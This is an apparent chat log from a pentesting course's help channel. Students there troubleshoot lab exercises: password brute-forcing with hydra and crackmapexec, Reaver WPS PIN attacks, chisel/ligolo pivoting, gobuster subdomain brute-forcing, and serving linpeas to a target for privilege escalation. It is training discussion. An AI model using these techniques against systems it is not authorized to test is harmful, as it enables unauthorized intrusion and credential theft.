Hi there, if we need some "explanation" about a specific part of a module , can we ask here or do we have to DM ? also I notice we do have to be careful with spoilers ?

fathom pendant
#

What module

wide narwhal
#

Windows Event Logs & Finding Evil > Get-WinEvent

cloud urchin
#

You can ask here just don't spoil or post parts of the module content

wide narwhal
#

Alright thank you

rustic sage
# final shale Try a reverse chisel proxy

I'm not coming up with what that means. Like put the server binary on the windows box like @cloud urchin is suggesting?

I'm attempting Kali -> Windows -> Domain controller so I thought it was Kali (Server) -> Windows (Client) -> DC

cloud urchin
wide narwhal
#

In the Windows Event Logs & Finding Evil > Get-WinEvent , about the question at the end, they assume in the powershell command the index's number that we need to put : for $_.Properties[x] . According to the module course, they find this index's number from the XML Windows Event Viewer , however about the skill assessment we have to look through logs from already saved logs files. So I don't understand how I can come up with the index number ? If I do the Windows Command Line module, would it be explained in there ?

rustic sage
#

Hello guys I'm in pentest path > password attacks > network services. I tried got all the flags except the rdp one. I tried hydra, crackmapexec and a few metasploit models but everytime I try to crack anything, I always get the same 4 users with their respective passwords. I tried to login with all of them while changing passwords to see if any of the passwords were reused or something. I was able to login to smb through one of these 4 users but rdp is still a mystery to me

median gale
#

How long did these bf take you ?

#

NEW WPS module

#

@dapper moth brother care help a fellow citizen ?

dapper moth
#

Sure

median gale
#

Did these take you also toooo long ?

dapper moth
#

Not that long

median gale
#

Like i am in the first network for like 15 mins

final shale
#

No. brute force is designed not to take too long.

median gale
#

And this is what i have so far

#

Restart the vm i guess ?

rustic sage
#

Is anyone doing password attacks module?

final shale
#

Well you are not doing something right

dapper moth
#

One or another would take a bit longer and I would just open the next section. I couldn't even finish the first paragraph of the next section and it would be done

#

What exact section is this in?

median gale
#

Early on, section Online PIN Brute-Forcing Using Reaver

#

Seems pretty straightforward i dont think i have missed anything

dapper moth
rustic sage
median gale
#

Let me try on the next network

dapper moth
#

That first one should take the longest, but not that long.
It should also iterate over

olive fiber
dapper moth
#

Can give it a try again

#

Just a sec

olive fiber
dapper moth
#

Almost no time

olive fiber
#

thiis is strange, command is exacltly the same and just havinig the same outpus as the other student

dapper moth
dapper moth
#

But jokes aside, perhaps something is wrong

#

Doesn't it update?

#

Cause it looks like it's stuck

olive fiber
#

next module works just fine for me

median gale
#

No its been like this for 10 minutes give or take

median gale
dapper moth
#

Mine was straight up

olive fiber
olive fiber
#

froom the next one, that uses differernt target machine

dapper moth
olive fiber
dapper moth
#

Idk... It took me no time for the first flag.
Third should take almost same amount of time

dire abyss
median gale
olive fiber
rustic sage
#

Hello guys I'm in pentest path > password attacks > network services. I tried got all the flags except the rdp one. I tried hydra, crackmapexec and a few metasploit models but everytime I try to crack anything, I always get the same 4 users with their respective passwords. I tried to login with all of them while changing passwords to see if any of the passwords were reused or something. I was able to login to smb through one of these 4 users but rdp is still a mystery to me

#

Can anyone confirm that AD Enum skill assessment part can be done without metasploit? I disabled firewall and can't find a way to get chisel or ligolo to connect to my attack machine. I know it's user error but it's not obvious why.

hollow arrow
cloud urchin
rustic sage
#

Hello guys ! Am working on footprinting module and I saw this (image below) . Is this correct ? I think CIFS that uses TCP directly instead of Netbios (smb v1 used to operate over netbios) . Am i mistaken ?

tranquil copper
#

there is a pw_attacks file in the resources tab for this specific lab that you have to use when bruteforcing

tranquil copper
terse sedge
#

Hello, I'm trying penetration testing process - getting started - privilege escalation. From Pwnbox, I'm trying to upload linpeas.sh to the ssh server. I have started a local http server in the same directory as linpeas.sh, but once I'm on the ssh server, I can't get the file with wget. It just fails and retries over and over.

rustic sage
#

It's through doing that that I get the 4 users

#

But none of them work even if I switch the passwords around with each other

midnight galleon
#

AD Enumeration & Attacks - Skills Assessment Part I, how do i speed up nmap scan over the network ? it is taking forever (using ligolo-ng)

upbeat wasp
#

hello, I have a doubt in the AD Recon module. I think its more regarding AD basics on the "Forest Trust" concept. If two domains have tree Root, bidiretctional Trust, An user from domain X can query any object on domain Z. But I read somewhere that some constrains on these queries can occur if the domains are not on the same network? This make any sense?

tranquil copper
midnight galleon
coarse panther
#

How did you end up finding the answer? I'm stuck at the same spot

tranquil copper
#

it works the same way as crackmapexec. Try running a scan using netexec against the target IP w the username and password list they give you.

olive fiber
coarse panther
#

I'm gonna go crazy 😄
Subdomain Bruteforcing - Info gathering Web Edition
Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.

I've been scanning for 30 minutes now , send help 😄

gobuster dns -d inlanefreight.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
terse sedge
urban elk
#

that looks fine, what does the failure look like ?

terse sedge
#

Connecting to 10.10.14.174:8080... failed: Connection timed out.
Retrying.

urban elk
#

ok, how are you bringing up your http server ?

#

maybe double-check if your VPN IP is still .14.174 - it might have changed without you noticing, it's happened to me

terse sedge
#

python3 -m http.server 8080

urban elk
#

yeah, you're doing everything right as far as I can tell. Might be something silly like that

#

nice username btw 🙂 I knew a guy who'd say "lets perform an exorcism" every time he drank a duvel

terse sedge
#

🙂

rustic sage
#

Bc at this point I'm thinking I have some trouble with my gpu

#

I let the password mutations room run for like 20 minutes on all services and it didn't give a password

cold star
#

hey

#

I am doing the ad enumeration module in which Bleeding edge vulners and in that printnightmare section

#

the problem is the cve.py file is not present there I have reset the machine many times also